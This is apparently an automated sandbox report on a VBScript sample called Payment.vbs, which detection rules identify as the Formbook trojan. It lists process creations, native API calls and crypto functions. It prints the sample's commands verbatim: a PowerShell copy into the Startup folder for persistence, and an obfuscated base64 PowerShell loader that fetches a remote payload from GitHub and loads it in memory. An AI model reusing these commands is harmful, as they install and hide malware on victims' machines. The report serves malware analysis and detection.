Source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 2436, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3768, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Sample has a suspicious name (potential lure to open the executable)

Source: Payment.vbs

Static file information: Suspicious name

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')	Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0042C853 NtClose,	10_2_0042C853
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039435C0 NtCreateMutant,LdrInitializeThunk,	10_2_039435C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942B60 NtClose,LdrInitializeThunk,	10_2_03942B60
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_03942DF0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_03942C70
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03944340 NtSetContextThread,	10_2_03944340
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03943090 NtSetValueKey,	10_2_03943090
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03943010 NtOpenDirectoryObject,	10_2_03943010
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03944650 NtSuspendThread,	10_2_03944650
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942B80 NtQueryInformationFile,	10_2_03942B80
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942BA0 NtEnumerateValueKey,	10_2_03942BA0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942BF0 NtAllocateVirtualMemory,	10_2_03942BF0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942BE0 NtQueryValueKey,	10_2_03942BE0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942AB0 NtWaitForSingleObject,	10_2_03942AB0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942AD0 NtReadFile,	10_2_03942AD0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942AF0 NtWriteFile,	10_2_03942AF0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039439B0 NtGetContextThread,	10_2_039439B0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942F90 NtProtectVirtualMemory,	10_2_03942F90
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942FB0 NtResumeThread,	10_2_03942FB0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942FA0 NtQuerySection,	10_2_03942FA0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942FE0 NtCreateFile,	10_2_03942FE0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942F30 NtCreateSection,	10_2_03942F30
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942F60 NtCreateProcessEx,	10_2_03942F60
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942E80 NtReadVirtualMemory,	10_2_03942E80
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942EA0 NtAdjustPrivilegesToken,	10_2_03942EA0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942EE0 NtQueueApcThread,	10_2_03942EE0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942E30 NtWriteVirtualMemory,	10_2_03942E30
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942DB0 NtEnumerateKey,	10_2_03942DB0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942DD0 NtDelayExecution,	10_2_03942DD0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942D10 NtMapViewOfSection,	10_2_03942D10
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03943D10 NtOpenProcessToken,	10_2_03943D10
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942D00 NtSetInformationFile,	10_2_03942D00
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942D30 NtUnmapViewOfSection,	10_2_03942D30
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03943D70 NtOpenThread,	10_2_03943D70
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942CA0 NtQueryInformationToken,	10_2_03942CA0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942CC0 NtQueryVirtualMemory,	10_2_03942CC0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942CF0 NtOpenProcess,	10_2_03942CF0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942C00 NtQueryInformationProcess,	10_2_03942C00
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942C60 NtCreateKey,	10_2_03942C60
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D4340 NtSetContextThread,LdrInitializeThunk,	19_2_036D4340
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D4650 NtSuspendThread,LdrInitializeThunk,	19_2_036D4650
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D35C0 NtCreateMutant,LdrInitializeThunk,	19_2_036D35C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2B60 NtClose,LdrInitializeThunk,	19_2_036D2B60
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2BE0 NtQueryValueKey,LdrInitializeThunk,	19_2_036D2BE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	19_2_036D2BF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2BA0 NtEnumerateValueKey,LdrInitializeThunk,	19_2_036D2BA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2AF0 NtWriteFile,LdrInitializeThunk,	19_2_036D2AF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2AD0 NtReadFile,LdrInitializeThunk,	19_2_036D2AD0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D39B0 NtGetContextThread,LdrInitializeThunk,	19_2_036D39B0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2F30 NtCreateSection,LdrInitializeThunk,	19_2_036D2F30
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2FE0 NtCreateFile,LdrInitializeThunk,	19_2_036D2FE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2FB0 NtResumeThread,LdrInitializeThunk,	19_2_036D2FB0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2EE0 NtQueueApcThread,LdrInitializeThunk,	19_2_036D2EE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2E80 NtReadVirtualMemory,LdrInitializeThunk,	19_2_036D2E80
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2D30 NtUnmapViewOfSection,LdrInitializeThunk,	19_2_036D2D30
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2D10 NtMapViewOfSection,LdrInitializeThunk,	19_2_036D2D10
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	19_2_036D2DF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2DD0 NtDelayExecution,LdrInitializeThunk,	19_2_036D2DD0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2C60 NtCreateKey,LdrInitializeThunk,	19_2_036D2C60
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	19_2_036D2C70
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2CA0 NtQueryInformationToken,LdrInitializeThunk,	19_2_036D2CA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D3010 NtOpenDirectoryObject,	19_2_036D3010
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D3090 NtSetValueKey,	19_2_036D3090
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2B80 NtQueryInformationFile,	19_2_036D2B80
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2AB0 NtWaitForSingleObject,	19_2_036D2AB0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2F60 NtCreateProcessEx,	19_2_036D2F60
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2FA0 NtQuerySection,	19_2_036D2FA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2F90 NtProtectVirtualMemory,	19_2_036D2F90
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2E30 NtWriteVirtualMemory,	19_2_036D2E30
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2EA0 NtAdjustPrivilegesToken,	19_2_036D2EA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D3D70 NtOpenThread,	19_2_036D3D70
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2D00 NtSetInformationFile,	19_2_036D2D00
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D3D10 NtOpenProcessToken,	19_2_036D3D10
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2DB0 NtEnumerateKey,	19_2_036D2DB0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2C00 NtQueryInformationProcess,	19_2_036D2C00
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2CF0 NtOpenProcess,	19_2_036D2CF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2CC0 NtQueryVirtualMemory,	19_2_036D2CC0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356F9F8 NtSetContextThread,	19_2_0356F9F8
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356F02A NtQueryInformationProcess,NtReadVirtualMemory,	19_2_0356F02A
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356F038 NtQueryInformationProcess,	19_2_0356F038

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD34632ED6	5_2_00007FFD34632ED6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD3463169F	5_2_00007FFD3463169F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD346338F2	5_2_00007FFD346338F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD34642B0A	6_2_00007FFD34642B0A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD346250AD	8_2_00007FFD346250AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD346228B5	8_2_00007FFD346228B5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD3462520D	8_2_00007FFD3462520D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD34620E05	8_2_00007FFD34620E05
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD34624EFD	8_2_00007FFD34624EFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD346217D1	8_2_00007FFD346217D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD346F312D	8_2_00007FFD346F312D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00418823	10_2_00418823
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004100C3	10_2_004100C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004100BA	10_2_004100BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004169FE	10_2_004169FE
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00416A03	10_2_00416A03
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004102E3	10_2_004102E3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0040E363	10_2_0040E363
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00403320	10_2_00403320
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0040E53B	10_2_0040E53B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0042EE43	10_2_0042EE43
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00402EA8	10_2_00402EA8
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00402EB0	10_2_00402EB0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00402790	10_2_00402790
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0395739A	10_2_0395739A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391E3F0	10_2_0391E3F0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D03E6	10_2_039D03E6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C132D	10_2_039C132D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FD34C	10_2_038FD34C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CA352	10_2_039CA352
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039152A0	10_2_039152A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B2C0	10_2_0392B2C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391B1B0	10_2_0391B1B0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D01AA	10_2_039D01AA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C81CC	10_2_039C81CC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039AA118	10_2_039AA118
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03900100	10_2_03900100
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03998158	10_2_03998158
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039DB16B	10_2_039DB16B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0394516C	10_2_0394516C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BF0CC	10_2_039BF0CC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C70E9	10_2_039C70E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CF0E0	10_2_039CF0E0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CF7B0	10_2_039CF7B0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390C7C0	10_2_0390C7C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03934750	10_2_03934750
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C16CC	10_2_039C16CC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392C6E0	10_2_0392C6E0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D0591	10_2_039D0591
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039AD5B0	10_2_039AD5B0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910535	10_2_03910535
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C7571	10_2_039C7571
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BE4F6	10_2_039BE4F6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CF43F	10_2_039CF43F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C2446	10_2_039C2446
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03901460	10_2_03901460
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392FB80	10_2_0392FB80
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C6BD7	10_2_039C6BD7
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03985BF0	10_2_03985BF0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0394DBF9	10_2_0394DBF9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CAB40	10_2_039CAB40
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CFB76	10_2_039CFB76
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390EA80	10_2_0390EA80
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03955AA0	10_2_03955AA0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039ADAAC	10_2_039ADAAC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BDAC6	10_2_039BDAC6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CFA49	10_2_039CFA49
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C7A46	10_2_039C7A46
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03983A6C	10_2_03983A6C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039129A0	10_2_039129A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039DA9A6	10_2_039DA9A6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03919950	10_2_03919950
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B950	10_2_0392B950
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03926962	10_2_03926962
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F68B8	10_2_038F68B8
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393E8F0	10_2_0393E8F0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039138E0	10_2_039138E0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397D800	10_2_0397D800
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03912840	10_2_03912840
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391A840	10_2_0391A840
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911F92	10_2_03911F92
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CFFB1	10_2_039CFFB1
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398EFA0	10_2_0398EFA0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03902FC8	10_2_03902FC8
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391CFE0	10_2_0391CFE0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CFF09	10_2_039CFF09
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03930F30	10_2_03930F30
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03952F28	10_2_03952F28
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03984F40	10_2_03984F40
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03922E90	10_2_03922E90
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CCE93	10_2_039CCE93
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03919EB0	10_2_03919EB0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CEEDB	10_2_039CEEDB
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CEE26	10_2_039CEE26
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910E59	10_2_03910E59
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03928DBF	10_2_03928DBF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392FDC0	10_2_0392FDC0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390ADE0	10_2_0390ADE0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391AD00	10_2_0391AD00
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C1D5A	10_2_039C1D5A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03913D40	10_2_03913D40
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C7D73	10_2_039C7D73
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0CB5	10_2_039B0CB5
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03900CF2	10_2_03900CF2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CFCF2	10_2_039CFCF2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910C00	10_2_03910C00
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03989C32	10_2_03989C32
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AC4393	17_2_03AC4393
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ACAAAE	17_2_03ACAAAE
